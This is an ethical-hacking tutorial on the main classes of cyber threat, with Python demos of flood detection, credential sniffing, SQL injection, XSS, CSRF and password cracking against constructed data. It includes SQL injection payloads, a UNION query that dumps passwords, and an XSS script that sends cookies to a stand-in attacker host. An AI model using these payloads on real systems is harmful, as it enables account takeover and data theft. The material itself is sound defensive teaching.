Types of Cyber Threats and Attacks

Before you can defend a system — or test its defenses — you need to know what you are defending against. Cyber threats come in many shapes. Each one targets a different part of a system or exploits a different kind of human or technical weakness.

This topic maps out the major attack categories an ethical hacker studies and learns to simulate. Understanding these threats helps you think like an attacker, which is exactly what ethical hacking requires.

Malware: Software Built to Cause Harm

Malware is malicious software: programs written to damage, disrupt, spy on, or gain unauthorized access to a computer system. It is among the most common tools in a cybercriminal's kit, and it usually arrives through one of the other attack types described below, such as a phishing email or an exposed, unpatched network service.

Viruses

A virus attaches itself to a clean file or program. When that host runs, the virus executes and copies itself into other files on the same machine; like a biological virus, it needs a host to replicate, and it needs someone to run that host. Early viruses spread through floppy disks. Today the infected host travels through email attachments, downloads from untrusted sites, and compromised websites. That dependence on the user running something is what separates a virus from a worm.

Worms

A worm needs no host file and no user action: it scans for other machines that expose a vulnerable service and copies itself to them automatically. In January 2003, the SQL Slammer worm infected roughly 75,000 machines within ten minutes using a single 376-byte UDP packet that triggered a buffer overflow in Microsoft SQL Server 2000, a flaw Microsoft had patched six months earlier. No user click was required, and the unpatched hosts were the only thing the worm needed.

Ransomware

Ransomware encrypts the victim's files (usually leaving the operating system bootable so the ransom note can be displayed) and demands payment, typically in cryptocurrency, in exchange for the decryption key. Many current operations also copy the data out before encrypting it and threaten to publish it, so restoring from backup alone does not end the extortion. Hospitals, schools, and city governments have paid hundreds of thousands of dollars, and in some cases millions, to recover their data.

Trojans

A Trojan disguises itself as something useful, such as a free game, a software crack, or a browser plugin. Once installed, it runs malicious code in the background, commonly opening a backdoor that gives the attacker remote control of the machine. The name comes from the Trojan horse of Greek mythology: it looks like a gift but carries an attack inside.

Spyware and Keyloggers

Spyware runs silently and collects information about the user — browsing habits, login credentials, financial data — and sends it to the attacker. A keylogger is a specific type of spyware that records every keystroke the user types. Attackers use keyloggers to capture passwords typed during a banking session.

Social Engineering: Attacking the Human

Social engineering does not attack software or hardware. It attacks people. Humans make mistakes, feel pressure, and can be deceived. Social engineering exploits these psychological tendencies to trick people into handing over access or sensitive information.

Phishing

Phishing uses fake emails, text messages, or websites that closely imitate legitimate ones. A phishing email might appear to come from a bank, asking the recipient to "verify their account" by clicking a link. The visible link text looks right, but the actual destination is a fake login page that records whatever the victim types. Checking the real URL before entering credentials is the simplest defense, and it is exactly the step the message is designed to rush the victim past.

Spear Phishing

Spear phishing is targeted phishing. Instead of sending the same fake email to a million people, the attacker researches a specific person or company and crafts a message that feels personally relevant. An attacker might email a company's finance manager pretending to be the CEO and asking for an urgent bank transfer; this variant, where an executive is impersonated to redirect payments, is known as business email compromise (BEC).

Pretexting

Pretexting involves creating a fabricated scenario, a pretext, to extract information or access. An attacker calls an IT helpdesk pretending to be a new employee who forgot their password. If the helpdesk resets the password without verifying identity through a channel the caller does not control (a call back to the number on record, a manager's confirmation), the attacker gains access.

Baiting

Baiting leaves malicious USB drives in parking lots, lobbies, or break rooms and relies on curiosity. Modern operating systems no longer run programs automatically when a drive is inserted, so the drive either carries a file the finder is tempted to open (a spreadsheet labelled "salaries", for example) or is a device that presents itself to the computer as a keyboard and types commands the moment it is connected. Security researchers who dropped drives across a university campus found that nearly half were plugged in and had a file opened.

Network-Based Attacks

Network attacks target the infrastructure that connects computers. Ethical hackers test networks to find misconfigurations, weak protocols, and unprotected services.

Man-in-the-Middle (MitM) Attacks

In a MitM attack, the attacker secretly positions themselves between two communicating parties. Imagine you send a letter to your bank but the attacker intercepts it, reads it, changes part of it, then forwards it. Both you and the bank think you are talking to each other, but the attacker sees and controls everything.

A common real-world example: an attacker sets up a public Wi-Fi hotspot named "Coffee Shop Free WiFi". Everything users send through it passes through the attacker's machine. Traffic to sites that use plain HTTP, or any other unencrypted protocol, can be read and altered outright. Traffic to HTTPS sites is protected unless the attacker can get the user to accept a bogus certificate or downgrade the connection, which is why browsers warn so loudly about certificate errors.

Denial of Service (DoS) and Distributed Denial of Service (DDoS)

A DoS attack floods a server with more requests, or more raw traffic, than it can handle, so it can no longer respond to legitimate users. A DDoS attack does the same thing using thousands of compromised machines (a botnet), often amplified by reflecting traffic off third-party servers, so the flood arrives from many source addresses at once. The target cannot simply block one IP address: each source may send only a little, and the damage comes from the aggregate.
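The difference between a single-source flood and a distributed one shows up directly in detection logic. The following is an added example, not code from the original page: it runs a simple per-source and aggregate rate check over constructed web-server log lines (the IPs, timestamps and thresholds are made up for illustration). The single-source flood trips the per-IP limit; the distributed flood keeps every source below it and only the aggregate count reveals the attack.

```python
from collections import Counter, defaultdict

# Constructed log lines in the form "<client_ip> <unix_timestamp> <request>".
# Neither flood is real traffic; both are generated here for the example.
SINGLE_SOURCE_FLOOD = ["198.51.100.7 1700000000 GET /" for _ in range(500)] + [
    "203.0.113.20 1700000001 GET /about",
    "203.0.113.21 1700000002 GET /contact",
]
# 5000 requests spread over 250 source addresses: 20 each, which looks like
# ordinary traffic per source and like a flood in total.
DISTRIBUTED_FLOOD = [f"192.0.2.{i % 250 + 1} 1700000000 GET /" for i in range(5000)]


def parse_log(lines):
    """Yield (ip, timestamp, request) tuples from lines in the constructed format."""
    for line in lines:
        ip, ts, request = line.split(" ", 2)
        yield ip, int(ts), request


def detect_floods(lines, window_seconds=10, per_ip_limit=100, total_limit=1000):
    """Bucket requests into fixed time windows and inspect the busiest one.

    Returns {"noisy_ips": set of sources over per_ip_limit in that window,
             "aggregate_flood": True if the window's total exceeds total_limit}.
    A classic DoS is caught by the first check; a DDoS usually only by the second.
    """
    per_window = defaultdict(Counter)
    for ip, ts, _ in parse_log(lines):
        per_window[ts // window_seconds][ip] += 1
    if not per_window:
        return {"noisy_ips": set(), "aggregate_flood": False}
    busiest = max(per_window.values(), key=lambda c: sum(c.values()))
    noisy = {ip for ip, n in busiest.items() if n > per_ip_limit}
    return {"noisy_ips": noisy, "aggregate_flood": sum(busiest.values()) > total_limit}


if __name__ == "__main__":
    print("single source:", detect_floods(SINGLE_SOURCE_FLOOD))
    print("distributed:  ", detect_floods(DISTRIBUTED_FLOOD))
```

In practice the aggregate signal has to be compared against a baseline for that time of day, and the response to a distributed flood is upstream filtering or scrubbing rather than a local block list, which is the point the paragraph above makes.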

DNS Spoofing

DNS translates a domain name such as "example.com" into the IP address the browser should connect to. In DNS spoofing, the attacker supplies a forged answer, either by injecting a fake response to a query on the local network or by poisoning a resolver's cache, so that "example.com" resolves to the attacker's server instead. The user types the correct address and sees it in the address bar, but lands on a fake site. With HTTPS, the impostor cannot present a valid certificate for the real name, so the browser's certificate warning is often the only visible sign that something is wrong.

Packet Sniffing

Data travels across networks in packets. A packet sniffer captures those packets and reads their contents. On unencrypted protocols such as HTTP, FTP, or Telnet, sniffing reveals usernames, passwords, and other sensitive data in plain text; on encrypted connections it still reveals who is talking to whom and how much, but not the content. Ethical hackers use sniffers such as Wireshark and tcpdump to analyze traffic during a penetration test.
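To make concrete what a sniffer on the rogue hotspot described above (or on any shared network segment) actually sees, here is an added example that is not part of the original page. It assembles a constructed IPv4/TCP packet carrying an HTTP request with Basic authentication, then parses it the way a sniffer would and pulls the credentials out; a second constructed packet carrying a TLS record yields nothing readable. The addresses, ports and credentials are invented for the example, and the packet builder skips checksums since nothing here touches a real network.

```python
import base64
import struct


def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Assemble a minimal IPv4 + TCP packet around `payload` (checksums left zero)."""
    ip_hdr = struct.pack(
        "!BBHHHBBH4s4s",
        0x45,                       # version 4, header length 5 words
        0,                          # DSCP/ECN
        40 + len(payload),          # total length
        0x1234,                     # identification
        0x4000,                     # don't-fragment, offset 0
        64,                         # TTL
        6,                          # protocol: TCP
        0,                          # header checksum (not computed here)
        bytes(int(o) for o in src.split(".")),
        bytes(int(o) for o in dst.split(".")),
    )
    tcp_hdr = struct.pack(
        "!HHIIBBHHH",
        sport, dport,
        1, 1,                       # sequence / acknowledgement numbers
        5 << 4,                     # data offset 5 words, no options
        0x18,                       # flags PSH|ACK
        65535, 0, 0,                # window, checksum (skipped), urgent pointer
    )
    return ip_hdr + tcp_hdr + payload


def sniff_http_credentials(packet: bytes):
    """Return (src, dst, username, password) if `packet` carries an HTTP request
    with Basic auth, else None.  Walks the IPv4 and TCP headers by their length
    fields rather than assuming fixed offsets."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 6:                      # not TCP
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    tcp = packet[ihl:]
    if len(tcp) < 20:
        return None
    payload = tcp[(tcp[12] >> 4) * 4:]
    try:
        text = payload.decode("ascii")      # HTTP is ASCII; TLS ciphertext is not
    except UnicodeDecodeError:
        return None
    for line in text.split("\r\n"):
        if line.lower().startswith("authorization: basic "):
            token = line.split(" ", 2)[2]
            user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
            return (src, dst, user, password)
    return None


# Constructed samples: a cleartext HTTP login and a TLS application-data record.
HTTP_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n"
    b"\r\n"
)
CLEARTEXT_PACKET = build_ipv4_tcp("10.0.0.5", "203.0.113.10", 51000, 80, HTTP_REQUEST)
TLS_PACKET = build_ipv4_tcp("10.0.0.5", "203.0.113.10", 51001, 443,
                            b"\x17\x03\x03\x00\x20" + bytes(range(0x80, 0xA0)))

if __name__ == "__main__":
    print("HTTP :", sniff_http_credentials(CLEARTEXT_PACKET))
    print("HTTPS:", sniff_http_credentials(TLS_PACKET))
```

The TLS packet still tells the sniffer the client, the server and the byte count; only the content is hidden. Real captures use a library such as scapy or a pcap reader for the framing, but the parsing steps are the same.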

Web Application Attacks

Web applications — websites, online banking portals, SaaS tools — are among the most attacked targets because they are publicly accessible and often contain valuable data.

SQL Injection

Many websites use a database to store user data and build SQL queries by pasting user input into the query text. SQL injection supplies input that the database parses as part of the query rather than treating as a value. A login form that is not properly protected might accept, in the password field:

' OR '1'='1

The leading quote closes the string the application opened, and the rest appends a condition that is always true, so the query matches a row and the attacker is logged in without a real password. Other payloads let an attacker read tables they were never meant to see, including every user's credentials, or modify data. The fix is to keep data and query text separate by using parameterized queries.
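Here is the injection above carried through end to end, as an added example that is not from the original page. It uses Python's built-in sqlite3 with a constructed one-user table: the vulnerable login pastes input into the query text, the safe login binds it as a parameter, and a vulnerable search endpoint shows how a UNION payload pulls the password column out of the same table.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the example; not a real application."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    # Input is interpolated into the SQL text, so quotes in the input become
    # part of the query's syntax.  With password = "' OR '1'='1" the WHERE
    # clause reads:  username = 'x' AND password = '' OR '1'='1'
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    # Parameterized query: the driver sends values separately from the SQL
    # text, so they are only ever compared as strings, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def search_vulnerable(conn, term: str) -> list[str]:
    # Same flaw in a search box.  A UNION payload appends a second SELECT
    # whose rows (here, passwords) come back as if they were usernames.
    sql = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql).fetchall()]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable login with payload:", login_vulnerable(db, "nobody", payload))
    print("safe login with payload:      ", login_safe(db, "nobody", payload))
    print("dumped via search:", search_vulnerable(db, "%' UNION SELECT password FROM users--"))
```

Note that the safe version needs no input filtering at all: the same payload is simply a password nobody has. Escaping quotes by hand is the common wrong fix; parameter binding is the right one.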

Cross-Site Scripting (XSS)

XSS injects malicious JavaScript into a web page viewed by other users. If a website inserts user-submitted content into its HTML without encoding it for the context where it appears, an attacker can post a comment that contains a script. Every visitor who loads that page runs the attacker's script in their browser, with that visitor's cookies and session. The script can steal session cookies, redirect users, or perform actions on their behalf.
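The following added example (not code from the original page) renders a constructed attacker comment into a page template two ways: unencoded, which leaves a live script tag, and HTML-encoded, which turns it into harmless text. It also shows the caveat that encoding is context-specific: inside an href attribute, escaping does nothing against a javascript: URL, so the scheme has to be validated as well. The payload, page template and URLs are invented for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed stored-XSS payload: the classic cookie exfiltration one-liner.
ATTACKER_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

PAGE = '<html><body><h1>Comments</h1><div class="comment">{}</div></body></html>'
LINK = '<a href="{}">profile</a>'


def render_vulnerable(comment: str) -> str:
    """User content dropped straight into the HTML body."""
    return PAGE.format(comment)


def render_safe(comment: str) -> str:
    """Same slot, but the content is encoded for an HTML text context, so
    '<' becomes '&lt;' and the browser shows the tag instead of running it."""
    return PAGE.format(html.escape(comment, quote=True))


def render_link_safe(url: str) -> str:
    """Attribute context: html.escape stops breaking out of the quotes, but a
    javascript: URL is still a valid, executable href, so the scheme must be
    checked separately.  Unknown schemes are replaced with a dead link."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return LINK.format(html.escape(url, quote=True))


def contains_script_tag(page_html: str) -> bool:
    """Crude check for the example only; a browser does full HTML parsing."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACKER_COMMENT))
    print("safe:      ", render_safe(ATTACKER_COMMENT))
    print("link:      ", render_link_safe("javascript:alert(document.cookie)"))
```

Template engines that auto-escape by default (Jinja2 with autoescape on, Django templates) do the text-context encoding for you; the attribute and URL cases, and any place a template marks content as "safe", are where injection usually survives.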

Cross-Site Request Forgery (CSRF)

CSRF tricks a logged-in user's browser into sending a request to a web application the user is already authenticated with. For example: a user is logged into their bank. The attacker lures the user to a web page (or sends an HTML email) containing an invisible image tag whose URL is the bank's transfer endpoint with the attacker's account as the destination. When the browser loads that image, it requests the URL and automatically attaches the user's bank cookies, so the transfer goes through on the user's active session. The attack works because the browser, not the attacker, supplies the credential. It is stopped by requiring something the attacker's page cannot read or set, such as a per-session token embedded in the bank's own form, and by marking session cookies SameSite so they are not sent on cross-site requests.
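The following added example (not code from the original page) simulates the scenario above with a constructed in-memory "bank": a session store, a transfer handler, and a forged request of the kind an attacker's page would trigger. Without a token check the forged transfer succeeds because the cookie alone authenticates it; with the check, the forged request is refused while the bank's own form, which carries the token, still works. Account names, balances and the token scheme are invented for illustration.

```python
import hmac
import secrets

# Constructed server state: session_id -> session, and account balances.
SESSIONS: dict[str, dict[str, str]] = {}
BALANCES: dict[str, int] = {"alice": 1000, "mallory": 0}


def login(user: str) -> str:
    """Create a session and a per-session CSRF token; return the cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(16)}
    return sid


def handle_transfer(cookie_sid: str, form: dict[str, str], require_token: bool) -> str:
    """POST /transfer.  `cookie_sid` is what the browser attached automatically;
    `form` is the request body.  With require_token=False this is the
    vulnerable handler; with True it demands the session's CSRF token."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "not logged in"
    if require_token:
        supplied = form.get("csrf_token", "")
        # Constant-time comparison so the token cannot be guessed byte by byte.
        if not hmac.compare_digest(supplied, session["csrf_token"]):
            return "csrf check failed"
    amount = int(form["amount"])
    BALANCES[session["user"]] -= amount
    BALANCES[form["to"]] = BALANCES.get(form["to"], 0) + amount
    return "ok"


def run_scenario(require_token: bool):
    """Replay the attack: a forged cross-site request, then a legitimate one.
    Returns (forged_result, legit_result, balances)."""
    BALANCES.update({"alice": 1000, "mallory": 0})
    sid = login("alice")
    # What <img src="https://bank.example/transfer?to=mallory&amount=500"> on the
    # attacker's page produces: the browser adds the cookie, but the attacker's
    # page cannot read the bank's token, so the form carries none.
    forged = {"to": "mallory", "amount": "500"}
    forged_result = handle_transfer(sid, forged, require_token)
    # The bank's own form includes the token it rendered for this session.
    legit = {"to": "mallory", "amount": "100", "csrf_token": SESSIONS[sid]["csrf_token"]}
    legit_result = handle_transfer(sid, legit, require_token)
    return forged_result, legit_result, dict(BALANCES)


if __name__ == "__main__":
    print("vulnerable:", run_scenario(require_token=False))
    print("protected: ", run_scenario(require_token=True))
```

Real frameworks (Django, Rails, Spring) render and verify this token for you; the second layer is `Set-Cookie: ...; SameSite=Lax`, which stops the browser from attaching the session cookie to cross-site POSTs in the first place, and the two defenses are normally used together.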

Password Attacks

Passwords remain the most common authentication method and therefore one of the most targeted elements in any system.

Brute Force

A brute force attack tries every possible combination of characters until it finds the correct password. A short, simple password like "cat1" falls in a fraction of a second. A 12-character password drawn at random from the full printable keyboard has roughly 5 × 10^23 possibilities; even at a trillion guesses per second, exhausting them takes thousands of years, and a slow password hash such as bcrypt or Argon2 on the server side multiplies that by several more orders of magnitude. How fast an attacker can guess depends on whether they are hitting a rate-limited login page or cracking stolen hashes offline on GPUs.

Dictionary Attack

Instead of trying every combination, a dictionary attack uses a pre-built list of common words, phrases, and known leaked passwords. Because many people use predictable passwords like "password123" or "welcome2024," dictionary attacks succeed at high rates against real-world systems.

Credential Stuffing

Millions of username and password combinations leak from data breaches every year. Attackers take these lists and automatically test them against other services, betting that users reuse the same credentials across multiple platforms. Because many people do reuse passwords, credential stuffing works at scale with minimal effort.
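The following added example (not code from the original page) puts numbers on the brute-force and dictionary passages above. It runs a dictionary attack against a constructed set of leaked salted SHA-256 hashes and computes worst-case brute-force times for the keyspaces discussed, at guess rates for a fast unsalted hash and for a deliberately slow one. The users, passwords, salt and wordlist are all made up for illustration.

```python
import hashlib

# Constructed wordlist of the kind built from past breaches.
WORDLIST = ["123456", "password", "welcome2024", "letmein", "password123", "qwerty"]

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def hash_password(password: str, salt: bytes) -> str:
    """Salted SHA-256, a fast hash: fine for the example, wrong for real storage."""
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def make_leak() -> dict[str, tuple[bytes, str]]:
    """Constructed 'leaked' table: user -> (salt, hash).  Not real data."""
    salt = b"constructed-salt"
    return {
        "bob": (salt, hash_password("welcome2024", salt)),
        "carol": (salt, hash_password("Tr0ub4dor&3", salt)),  # not in the wordlist
    }


def dictionary_attack(leak, wordlist) -> dict[str, str]:
    """Hash every wordlist entry with each user's salt and compare.
    Returns the users whose password was recovered."""
    cracked = {}
    for user, (salt, digest) in leak.items():
        for candidate in wordlist:
            if hash_password(candidate, salt) == digest:
                cracked[user] = candidate
                break
    return cracked


def brute_force_years(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to exhaust every password of `length` characters drawn
    from `charset_size` symbols, in years.  Expected time is half this."""
    return charset_size ** length / guesses_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    print("dictionary attack recovered:", dictionary_attack(make_leak(), WORDLIST))
    # "cat1": lowercase + digits, 4 characters, 1e9 guesses/s
    print("cat1, fast hash:      %.2e years" % brute_force_years(36, 4, 1e9))
    # 12 random printable characters, 1e12 guesses/s against a fast hash
    print("12 random, fast hash: %.2e years" % brute_force_years(95, 12, 1e12))
    # same password, but a slow hash limits the attacker to ~1e5 guesses/s
    print("12 random, slow hash: %.2e years" % brute_force_years(95, 12, 1e5))
```

The per-user salt in the leak is what forces the attacker to hash each candidate once per user instead of once for the whole table; a slow, memory-hard hash is what turns the 95^12 keyspace from "thousands of years" into "not in the lifetime of the universe". Credential stuffing sidesteps all of this, which is why it is the cheapest of the three.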

Insider Threats

Not every attack comes from outside the organization. Insider threats involve current employees, former employees, or contractors who misuse their authorized access. An insider threat can be:

  • A disgruntled employee who deletes critical files before resigning
  • A contractor who copies sensitive data to a personal device
  • An employee who falls for a phishing email and gives attackers a foothold
  • A privileged administrator who abuses database access for personal gain

Insider threats are particularly dangerous because the attacker already has authorized access. Traditional perimeter defenses do not stop someone who is already inside.

Threat Diagram: Attack Surface Overview

Think of an organization as a medieval castle:

  • Outer wall — the network perimeter (firewall, IDS/IPS)
  • Gate — web applications and public-facing services
  • Drawbridge — remote access tools and VPNs
  • Villagers inside — employees who can be manipulated through social engineering
  • Guards — IT administrators with elevated privileges
  • Underground tunnels — forgotten legacy systems and unpatched software

An attacker can target any of these. An ethical hacker tests all of them.

Key Points

  • Malware includes viruses, worms, ransomware, Trojans, and spyware — each with a different method of infection and purpose.
  • Social engineering attacks the human element — phishing, spear phishing, pretexting, and baiting exploit trust and psychology rather than technology.
  • Network attacks include MitM, DoS/DDoS, DNS spoofing, and packet sniffing.
  • Web application attacks such as SQL injection, XSS, and CSRF target vulnerabilities in code rather than network infrastructure.
  • Password attacks — brute force, dictionary attacks, and credential stuffing — exploit weak or reused credentials.
  • Insider threats are difficult to detect because the attacker already has authorized access.
